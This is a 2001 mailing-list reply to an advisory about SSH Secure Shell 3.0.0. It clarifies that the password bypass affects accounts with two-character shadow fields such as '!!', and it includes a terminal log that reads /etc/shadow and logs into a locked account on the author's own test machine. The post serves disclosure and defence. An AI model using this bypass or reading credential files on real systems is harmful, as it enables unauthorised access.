Re: URGENT SECURITY ADVISORY FOR SSH SECURE SHELL 3.0.0

From: Jen B. (jenat_private)
Date: Sat Jul 21 2001 - 01:47:53 PDT

    <from SSH's advisory>
    > in SSH Secure Shell 3.0.0, for Unix only, concerning
    > accounts with password fields consisting of two or
    > fewer characters.

    I've tested this on a few machines that I recently upgraded
    and have a nit to pick the "or fewer" portion of this statement.
    It's quite late here and I feel I am stating the elementary,
    further comments and corrections would be very helpful.

    On RH 6.2 some of the password fields are
    nulled in /etc/shadow with "*" and some with "!!"

    The only accounts vulnerable to this bug were the ones using "!!"
    or any other two-character combinations that I tried. I replaced
    the offending accounts with a single character and was unable to login
    with the "ease" that I had before. I tested on  Debian 2.2 and
    RedHat 6.2.  It is worth noting that Debian does NOT null logins in
    /etc/shadow using two characters by default like Red Hat.

    btw, I also tested on FreeBSD-4.2 and was unable to login
    without providing the proper password regardless of the number of
    characters I had in the password field.

    -Jen
    jenat_private

    debian:~# telnet localhost 22
    Trying 127.0.0.1...
    Connected to localhost.
    Escape character is '^]'.
    SSH-2.0-3.0.0 SSH Secure Shell (non-commercial)

    Connection closed by foreign host.
    debian:~# uname -a
    Linux debian 2.4.6-pre3 #4 SMP Tue Jun 26 12:34:37 EST 2001 ppc unknown
    debian:~# cat /etc/shadow | grep irc
    irc:!!:11498:0:99999:7:::
    debian:~# ssh -l irc localhost
    irc's password:
    Authentication successful.
    Last login: Sat Jul 21 2001 01:44:01 -0500
    No mail.
    irc@debian:~$
    debian:~# vi /etc/shadow
    debian:~# cat /etc/shadow | grep irc
    irc:!:11498:0:99999:7:::
    debian:~# ssh -l irc localhost
    irc's password:
    irc's password:
    irc's password:
    warning: Authentication failed.
    Disconnected; no more authentication methods available (No further
    authentication methods available.).